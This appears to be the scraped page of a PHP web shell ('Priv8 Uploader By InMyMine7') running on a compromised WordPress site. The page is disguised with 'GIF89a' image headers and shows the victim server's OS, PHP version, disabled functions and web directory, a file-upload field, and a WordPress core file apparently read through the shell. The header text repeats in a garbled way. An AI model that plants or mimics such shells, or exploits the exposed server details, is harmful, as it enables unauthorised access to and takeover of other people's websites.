GIF89a;
GIF89a;Priv8 Uploader By InMyMine7
Windows NT 5KQS5 10.0 build 17763 (Windows Server 2016) AMD64
GIF89a;Priv8 Uploader By InMyMine7
Windows NT 5KQS5 10.0 build 17763 (Windows Server 2016) AMD64
Priv8 Uploader By InMyMine7
Windows NT 5KQS5 10.0 build 17763 (Windows Server 2016) AMD64
|
Server : Microsoft-IIS/10.0 System : Windows NT 5KQS5 10.0 build 17763 (Windows Server 2016) AMD64 User : 80.com ( 0) PHP Version : 7.4.33 Disable Function : passthru,system,chroot,chgrp,chown,shell_exec,proc_open,proc_get_status,popen,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,putenv,exec Directory : d:/wwwroot/80.com/wp-includes/ |
Upload File : |
<?php
/**
* WordPress database access abstraction class.
*
* This file is deprecated, use 'wp-includes/class-wpdb.php' instead.
*
* @deprecated 6.1.0
* @package WordPress
*/
if ( function_exists( '_deprecated_file' ) ) {
// Note: WPINC may not be defined yet, so 'wp-includes' is used here.
_deprecated_file( basename( __FILE__ ), '6.1.0', 'wp-includes/class-wpdb.php' );
}
/** wpdb class */
require_once __DIR__ . '/class-wpdb.php';